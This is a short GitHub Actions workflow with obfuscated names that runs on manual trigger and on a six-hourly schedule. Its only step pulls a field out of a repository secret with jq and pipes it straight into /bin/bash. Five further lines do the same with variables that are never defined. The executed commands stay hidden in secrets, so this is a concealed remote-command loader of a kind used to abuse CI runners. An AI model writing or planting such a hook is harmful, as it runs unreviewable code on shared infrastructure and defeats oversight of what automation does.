name: huangganling2003
on:
  workflow_dispatch:
  schedule:
    - cron: '13 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huangganling2003
        env:
          lmgnt983: ${{ secrets.lmgnt983 }}
        run: |
          echo $lmgnt983 | jq -r .u9091 | /bin/bash
          echo $ik05332 | jq -r .n25181 | /bin/bash
          echo $pc061 | jq -r .wo5 | /bin/bash
          echo $hdra0969 | jq -r .iyxi7155 | /bin/bash
          echo $ebbzi916 | jq -r .sqtja2087 | /bin/bash
          echo $u60 | jq -r .tkx48 | /bin/bash

